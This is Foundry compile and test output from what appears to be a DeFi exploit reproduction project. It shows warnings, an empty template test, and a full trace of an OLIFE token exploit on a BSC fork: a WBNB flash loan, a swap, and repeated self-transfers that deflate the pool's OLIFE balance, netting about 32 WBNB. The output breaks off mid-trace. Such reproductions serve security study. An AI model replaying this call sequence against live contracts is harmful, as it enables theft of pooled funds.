Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-04/OLIFE_exp.sol:30:5:
   |
30 |     IERC20 constant WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/OLIFE_exp.sol:60:31:
   |
60 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/OLIFE_exp.sol:60:47:
   |
60 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/OLIFE_exp.sol:60:67:
   |
60 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/OLIFE_exp.sol:60:88:
   |
60 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 548.99ms (2.00ms CPU time)

Ran 1 test for src/test/2023-04/OLIFE_exp.sol:ContractTest
[PASS] testExploit() (gas: 2025057)
Logs:
  [INFO] OLIFE amount in pair before the currentRate reduction: 5583143.203784247
  [INFO] OLIFE amount in pair after the currentRate reduction: 217839506118721725361.721643770
  [End] Attacker WBNB balance after exploit: 32.286315327663894139

Traces:
  [5830] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 27470678 [2.747e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [2056157] ContractTest::testExploit()
    ├─ [2047892] 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681::flashLoan(969000000000000000000 [9.69e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 969000000000000000000 [9.69e20])
    │   │   ├─ emit Transfer(from: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 969000000000000000000 [9.69e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000003487938e0499840000
    │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x000000000000000000000000000000000000000000000034a08791aaca8660fd → 0x00000000000000000000000000000000000000000000000018f403a6310260fd
    │   │   └─ ← [Return] true
    │   ├─ [1989087] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 969000000000000000000 [9.69e20], 0, 0x00)
    │   │   ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [277713] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(969000000000000000000 [9.69e20], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1681866278 [1.681e9])
    │   │   │   ├─ [8225] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84, 969000000000000000000 [9.69e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84, value: 969000000000000000000 [9.69e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000003487938e0499840000 → 0
    │   │   │   │   │   @ 0x4071999b347ef650176ac9588cd0a542b42db90b068e9aa61ca79807f994054d: 0x000000000000000000000000000000000000000000000001c01008baf5307e32 → 0x00000000000000000000000000000000000000000000003647a396bf8eb47e32
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [56212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 161703370635833872 [1.617e17], 32286315327689621042 [3.228e19], 1648855566 [1.648e9]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   │   └─ ← [Return] 1001286315327689621042 [1.001e21]
    │   │   │   ├─ [181445] 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84::swap(156476626074878834 [1.564e17], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [131390] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 156476626074878834 [1.564e17])
    │   │   │   │   │   ├─ emit Transfer(from: 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84, to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 9388597564492730 [9.388e15])
    │   │   │   │   │   ├─ emit Transfer(from: 0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 139264197206642163 [1.392e17])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x02eafc134d43716eabb37a11d6a1544214e8aeb44be69156d105c4ddb2eda339 → 0x099dc7e65973b311daf04681a7f50081a1a845944de40f348155d392a57eec39
    │   │   │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000004ce88d10099eac → 0x000000000000000000000000000000000000000000000000005d95fdab6c4489
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000099d11a201340e0 → 0x00000000000000000000000000000000000000000000000000bb2bfb56d88c9a
    │   │   │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x00000000000000000000000000000000000000000000000000022cf335768443 → 0x000000000000000000000000000000000000000000000000002387d46c3bcffd
    │   │   │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000003345b36006689c → 0x000000000000000000000000000000000000000000000000003e63fe72482c84
    │   │   │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000003686eebf9939764 → 0x000000000000000000000000000000000000000000000000035d50a0e751d37c
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x635c24ba8a2123391e214c5e2c2e93f176d29a7f966359c5fe688ade1920a380
    │   │   │   │   │   │   @ 9: 0xbda9c203138c5d024641fdbed24887862a393bb5de7db97ee6324d3426b76851 → 0xb161f70027de8f79606040e39819d8330fb6555d97469a1f46820a996f87d6d1
    │   │   │   │   │   │   @ 0x67bffd0dcfb19fdaa024128ed3fe27bfbe0f9ff1e44a92211251a4ef6217aa79: 0x735e95833cec46c4cd470d72c7edc07a744b20002ebcd64dabefed7c07fd5499 → 0x03baa5c5c71d5602c944043961907d35e2f59f2851225d280dd7200337ad1f99
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5583143203784247 [5.583e15]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1001286315327689621042 [1.001e21]
    │   │   │   │   ├─ emit Sync(reserve0: 5583143203784247 [5.583e15], reserve1: 1001286315327689621042 [1.001e21])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 356398642829209 [3.563e14], amount1In: 969000000000000000000 [9.69e20], amount0Out: 156476626074878834 [1.564e17], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x000000000000000000000000000193216d244aa48a85f63056b0dacd9a3e25f4 → 0x00000000000000000000000000031bfccc3a0077849f9bb298385717e806ce6c
    │   │   │   │   │   @ 10: 0x00000000000000000000000000000001b4d4331b001a35c05bfadcba3ea0e598 → 0x000000000000000000000000000000043aa7a6daacb1b55a595e7cc380c9c130
    │   │   │   │   │   @ 8: 0x62478a0e000000000001c01008baf5307e32000000000000023e7c5bddbb7210 → 0x643f3e2600000000003647a396bf8eb47e320000000000000013d5d6d3644637
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 148760274602488242 [1.487e17]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(0x915C2DFc34e773DC3415Fe7045bB1540F8BDAE84) [staticcall]
    │   │   │   └─ ← [Return] 5583143203784247 [5.583e15]
    │   │   ├─ emit log_named_decimal_uint(key: "[INFO] OLIFE amount in pair before the currentRate reduction", val: 5583143203784247 [5.583e15], decimals: 9)
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 148760274602488242 [1.487e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 148760274602488242 [1.487e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 8925616476149294 [8.925e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 132396644396214537 [1.323e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000005d95fdab6c4489 → 0x000000000000000000000000000000000000000000000000006d70e42f276fa0
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000003e63fe72482c84 → 0x0000000000000000000000000000000000000000000000000048f5ed74c4f3e8
    │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000035d50a0e751d37c → 0x0000000000000000000000000000000000000000000000000352beb1e4d50c18
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x099dc7e65973b311daf04681a7f50081a1a845944de40f348155d392a57eec39 → 0x0f93f31043050c1ed361bd0688c2c053aded545aa8cd162c7edcd197bff05685
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000000bb2bfb56d88c9a → 0x00000000000000000000000000000000000000000000000000dae1c85e4ee2c8
    │   │   │   │   @ 9: 0xb161f70027de8f79606040e39819d8330fb6555d97469a1f46820a996f87d6d1 → 0xa673fd3350fec1ac598702a7665b8f8f1ec07e738fe8b91321a1a1efea73f677
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000002387d46c3bcffd → 0x00000000000000000000000000000000000000000000000000433da173b2262b
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x635c24ba8a2123391e214c5e2c2e93f176d29a7f966359c5fe688ade1920a380 → 0x586e2aedb341556c17480e21fa704b4d85dcc3958f0578b9d9882234940cc326
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 141471658788257173 [1.414e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 141471658788257173 [1.414e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 8488299527295430 [8.488e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 125909776321548885 [1.259e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x586e2aedb341556c17480e21fa704b4d85dcc3958f0578b9d9882234940cc326 → 0x4eb3f8205a6ac9a9ca375e0b1633fe609a4f1ee507e6cafdd260d30f8e55b066
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000006d70e42f276fa0 → 0x000000000000000000000000000000000000000000000000007c84ec4e309883
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000000048f5ed74c4f3e8 → 0x000000000000000000000000000000000000000000000000005303483420647f
    │   │   │   │   @ 9: 0xa673fd3350fec1ac598702a7665b8f8f1ec07e738fe8b91321a1a1efea73f677 → 0x9cb9ca65f82835ea0c765290821f42a23332d9c308ca0b571a7a52cae4bce3b7
    │   │   │   │   @ 8: 0x0000000000000000000000000000000000000000000000000352beb1e4d50c18 → 0x0000000000000000000000000000000000000000000000000348b15725799b81
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x00000000000000000000000000000000000000000000000000433da173b2262b → 0x000000000000000000000000000000000000000000000000006165b1b1c477f1
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x0f93f31043050c1ed361bd0688c2c053aded545aa8cd162c7edcd197bff05685 → 0x14e23d51b94b86ee169da466619a41593c7acd9d7ec1eda38a2f72a421bd07cf
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000000dae1c85e4ee2c8 → 0x00000000000000000000000000000000000000000000000000f909d89c61348e
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 134591172410904054 [1.345e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 134591172410904054 [1.345e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 8075470344654243 [8.075e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 119786143445704609 [1.197e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x14e23d51b94b86ee169da466619a41593c7acd9d7ec1eda38a2f72a421bd07cf → 0x199b1e20770a411170aea8913c6e209a6957e02e6da53a14346a26bb51972a43
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000007c84ec4e309883 → 0x000000000000000000000000000000000000000000000000008add38c8d55f54
    │   │   │   │   @ 8: 0x0000000000000000000000000000000000000000000000000348b15725799b81 → 0x000000000000000000000000000000000000000000000000033f2124290bc1a0
    │   │   │   │   @ 9: 0x9cb9ca65f82835ea0c765290821f42a23332d9c308ca0b571a7a52cae4bce3b7 → 0x941183959c4a8b68f8c35b0f440188c0fca42f86c7af45acff7dc2a5e4488e0b
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x4eb3f8205a6ac9a9ca375e0b1633fe609a4f1ee507e6cafdd260d30f8e55b066 → 0x460bb14ffe8d1f28b6846689d816447f63c074a8c6cc0553b76442ea8de15aba
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000005303483420647f → 0x000000000000000000000000000000000000000000000000005c937b308e3e60
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000000f909d89c61348e → 0x0000000000000000000000000000000000000000000000000115ba7191aac231
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000006165b1b1c477f1 → 0x000000000000000000000000000000000000000000000000007e164aa70e0594
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 128100544485915659 [1.281e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 128100544485915659 [1.281e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 7686032669154939 [7.686e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 114009484592464938 [1.14e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000005c937b308e3e60 → 0x0000000000000000000000000000000000000000000000000065ad9dd58c4889
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x199b1e20770a411170aea8913c6e209a6957e02e6da53a14346a26bb51972a43 → 0x1dcf04ecf1d547f8daa8dd2428aa621954c1c00ebd1328193411e8923ffdcf1e
    │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000033f2124290bc1a0 → 0x00000000000000000000000000000000000000000000000003360701840db777
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000115ba7191aac231 → 0x000000000000000000000000000000000000000000000000013108d980a4e0ac
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000007e164aa70e0594 → 0x000000000000000000000000000000000000000000000000009964b29608240f
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000008add38c8d55f54 → 0x0000000000000000000000000000000000000000000000000098846cc0526e91
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x460bb14ffe8d1f28b6846689d816447f63c074a8c6cc0553b76442ea8de15aba → 0x3e5734d91d6e3d3ed240d21e278ce761491c950eea6298e45cd3d84b3943d1b9
    │   │   │   │   @ 9: 0x941183959c4a8b68f8c35b0f440188c0fca42f86c7af45acff7dc2a5e4488e0b → 0x8c5d071ebb2ba97f147fc6a393782ba2e2004feceb45d93da4ed58068fab050a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 121982829150099218 [1.219e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 121982829150099218 [1.219e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 7318969749005953 [7.318e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 108564717943588305 [1.085e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x1dcf04ecf1d547f8daa8dd2428aa621954c1c00ebd1328193411e8923ffdcf1e → 0x218c925621add0c146125e58df0fb8dc1a799cab14c369b1a3e01752452790c3
    │   │   │   │   @ 10: 0x0000000000000000000000000000000000000000000000000098846cc0526e91 → 0x00000000000000000000000000000000000000000000000000a584b4f853e1d1
    │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000013108d980a4e0ac → 0x000000000000000000000000000000000000000000000000014b0969f0a7c72d
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000000065ad9dd58c4889 → 0x000000000000000000000000000000000000000000000000006e5878a58d4009
    │   │   │   │   @ 9: 0x8c5d071ebb2ba97f147fc6a393782ba2e2004feceb45d93da4ed58068fab050a → 0x858183dde374042e55159967673687fcc7f527eac1dfd59a1bcee18bd66915a5
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000003360701840db777 → 0x000000000000000000000000000000000000000000000000032d5c26b40cbff7
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x3e5734d91d6e3d3ed240d21e278ce761491c950eea6298e45cd3d84b3943d1b9 → 0x377bb19845b697ee12d6a4e1fb4b43bb2f116d0cc0fc9540d3b561d08001e254
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000009964b29608240f → 0x00000000000000000000000000000000000000000000000000b36543060b0a90
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 116222410514182509 [1.162e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 116222410514182509 [1.162e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 6973344630850950 [6.973e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 103437945357622434 [1.034e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x218c925621add0c146125e58df0fb8dc1a799cab14c369b1a3e01752452790c3 → 0x24e0cb1277c821799a19ecb5c3e5fbf6e34a72c38167e3649d6b1ac158034abf
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000a584b4f853e1d1 → 0x00000000000000000000000000000000000000000000000000b1e7d121230494
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000006e5878a58d4009 → 0x00000000000000000000000000000000000000000000000000769a8b6b6cac8b
    │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000014b0969f0a7c72d → 0x0000000000000000000000000000000000000000000000000163cfa242460cb3
    │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000032d5c26b40cbff7 → 0x00000000000000000000000000000000000000000000000003251a13ee2d5375
    │   │   │   │   @ 9: 0x858183dde374042e55159967673687fcc7f527eac1dfd59a1bcee18bd66915a5 → 0x7f671bd9f043c587105d1467c3adb7a102764a135007a127525005eade80eb57
